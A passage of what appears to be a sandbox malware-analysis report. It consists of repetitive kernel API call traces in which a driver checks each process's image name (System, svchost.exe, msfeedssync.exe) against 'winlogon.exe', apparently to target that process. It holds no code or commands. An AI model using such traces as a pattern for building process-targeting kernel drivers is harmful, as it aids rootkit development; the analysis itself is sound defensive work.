| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a459040 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a459490 |
| _stricmp | _Str1 = System, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #196 (length: 159, count: 1, processes: 1 incomplete)
»
| Information | Value |
|---|---|
| Sequence Length | 159 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 |
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 |
Kernel Graph 9
Code Block #13 (EP #11, #19, #24, #27, #25, #31, #147, #43, #48, #49, #53, #54, #55, #56, #59, #65, #67, #68, #69, #70, #71, #74, #75, #77, #80,...)
»
| Information | Value |
|---|---|
| Trigger | IofCallDriver+0x4b |
| Start Address | 0xfffff800fc2ba090 |
Execution Path #11 (length: 58, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 58 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003be10400 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003be10850 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x467, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a7638f0 |
